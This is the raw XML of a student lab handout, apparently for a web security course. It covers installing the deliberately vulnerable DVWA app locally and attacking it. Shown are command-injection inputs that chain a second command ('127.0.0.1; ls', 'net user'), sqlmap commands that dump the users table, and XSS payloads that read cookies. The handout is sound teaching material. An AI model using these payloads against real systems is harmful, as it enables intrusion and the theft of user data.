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3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Experiment 04: Examination of a website to test the vulnerability of attacks</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p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Creating vulnerable infrastructure (installing and configuring DVWA):</w:t>
      </w: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Downloading DVWA:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>cd /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>sudo git clone https://github.com/digininja/DVWA.git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>sudo mv DVWA dvwa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>sudo chmod -R 777 dvwa/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>cd dvwa/config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>sudo cp config.inc.php.dist config.inc.php</w:t>
      </w:r>
    </w:p>
    <w:p/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Configuring Database:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>sudo service mysql start</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>sudo mysql -u root –p</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p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Creating database and users:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>create database dvwa;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>create user dvwa@localhost identified by 'p@ssw0rd';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>grant all on dvwa.* to dvwa@localhost;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>flush privileges;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>exit;</w:t>
      </w:r>
    </w:p>
    <w:p/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Configuring project for LFI/RFI (Optional – Only required if we are doing exercises related to LFI/RFI):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>cd /etc/php/7.4/apache2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>sudo nano php.ini</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="17583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Finalizing the steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sudo service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Visit the website: http://127.0.0.1/dvwa/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Login with the Username/Password: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Click for Reset Database and then login again.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Visit to DVWA security and change from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘impossible’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘low’</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p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Attacking the system:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Command Line Injection:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>127.0.0.1; ls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>127.0.0.1;cat ../view_source.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>127.0.0.1;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>net user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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SQL injection:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In order to exploit SQL injection, we will be using the SQL map.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Capture the post request using the BurpSuite and save it in a file (let’s say file name is sqlmaplow.txt).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Let’s use sqlmap to exploit it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sqlmap –r sqlmaplow.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sqlmap –r sqlmaplow.txt --tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sqlmap –r sqlmaplow.txt –t users --columns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sqlmap –r sqlmaplow.txt –t users --dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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XSS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt;alert(“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vv</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>”)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single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C51B6D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26C51B6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CA46AA8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7CA46AA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E21BCF"/>
    <w:rsid w:val="00053C47"/>
    <w:rsid w:val="000B607A"/>
    <w:rsid w:val="001B7E4B"/>
    <w:rsid w:val="00214852"/>
    <w:rsid w:val="003029EB"/>
    <w:rsid w:val="004715CC"/>
    <w:rsid w:val="00561723"/>
    <w:rsid w:val="005B27C4"/>
    <w:rsid w:val="005C0E12"/>
    <w:rsid w:val="006232FD"/>
    <w:rsid w:val="00644962"/>
    <w:rsid w:val="006506C3"/>
    <w:rsid w:val="0066041A"/>
    <w:rsid w:val="006932AC"/>
    <w:rsid w:val="00693E58"/>
    <w:rsid w:val="006D23E5"/>
    <w:rsid w:val="0071019B"/>
    <w:rsid w:val="007D5222"/>
    <w:rsid w:val="00816D62"/>
    <w:rsid w:val="008323F6"/>
    <w:rsid w:val="00870409"/>
    <w:rsid w:val="00885E02"/>
    <w:rsid w:val="008909BD"/>
    <w:rsid w:val="008B4B01"/>
    <w:rsid w:val="008F5E4F"/>
    <w:rsid w:val="009547DD"/>
    <w:rsid w:val="00956054"/>
    <w:rsid w:val="009D0BD5"/>
    <w:rsid w:val="00A62EDC"/>
    <w:rsid w:val="00AB2C30"/>
    <w:rsid w:val="00AE4DAC"/>
    <w:rsid w:val="00B45702"/>
    <w:rsid w:val="00B537A3"/>
    <w:rsid w:val="00BA57AD"/>
    <w:rsid w:val="00BE0886"/>
    <w:rsid w:val="00C557A1"/>
    <w:rsid w:val="00D12D02"/>
    <w:rsid w:val="00E21BCF"/>
    <w:rsid w:val="00E24F0D"/>
    <w:rsid w:val="00FB37C1"/>
    <w:rsid w:val="4A0801A7"/>
    <w:rsid w:val="745E3A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9"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:widowControl w:val="0"/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6">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="1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8">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="3"/>
    <w:uiPriority w:val="59"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/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Body Text Char"/>
    <w:basedOn w:val="2"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="2"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:val="en-US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lang w:val="en-US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Balloon Text Char"/>
    <w:basedOn w:val="2"/>
    <w:link w:val="4"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="1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220</Words>
  <Characters>1258</Characters>
  <Lines>10</Lines>
  <Paragraphs>2</Paragraphs>
  <TotalTime>27</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1476</CharactersWithSpaces>
  <Application>WPS Office_11.2.0.11254_F1E327BC-269C-435d-A152-05C5408002CA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2022-06-30T16:46:00Z</dcterms:created>
  <dc:creator>Prashant Dey</dc:creator>
  <cp:lastModifiedBy>STUDENT</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-25T04:51:09Z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081581D87C334B66A7E3CCFF33C04017</vt:lpwstr>
  </property>
</Properties>
</file>